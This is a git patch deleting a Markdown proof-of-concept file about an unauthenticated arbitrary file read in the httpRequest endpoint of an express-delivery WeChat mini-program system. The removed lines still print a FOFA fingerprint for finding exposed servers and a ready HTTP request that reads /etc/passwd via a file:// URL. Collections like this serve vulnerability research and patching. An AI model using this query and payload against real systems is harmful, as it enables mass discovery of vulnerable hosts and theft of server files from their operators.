From 0094a3dfe137a3cc75c79cbf5c5072ead26b598b Mon Sep 17 00:00:00 2001
From: Nexolanta <73454853+Nexolanta@users.noreply.github.com>
Date: Thu, 6 Mar 2025 17:23:39 +0800
Subject: [PATCH] =?UTF-8?q?Delete=20wpoc/=E5=BF=AB=E9=80=92=20directory?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��微信小程序系统httpRequest任意文件读取漏洞.md | 23 -------------------
 1 file changed, 23 deletions(-)
 delete mode 100644 wpoc/快递/快递微信小程序系统httpRequest任意文件读取漏洞.md

diff --git a/wpoc/快递/快递微信小程序系统httpRequest任意文件读取漏洞.md b/wpoc/快递/快递微信小程序系统httpRequest任意文件读取漏洞.md
deleted file mode 100644
index 281fb0f..0000000
--- a/wpoc/快递/快递微信小程序系统httpRequest任意文件读取漏洞.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# 快递微信小程序系统httpRequest任意文件读取漏洞
-
-快递微信小程序系统 httpRequest 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统文件。
-
-## fofa
-
-```javascript
-body="static/default/newwap/lang/js/jquery.localize.min.js"
-```
-
-## poc
-
-```javascript
-GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2
-Host: 
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
-Accept-Encoding: gzip, deflate, br, zstd
-Connection: keep-alive
-```
-
-![image-20241101192644761](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011926836.png)
\ No newline at end of file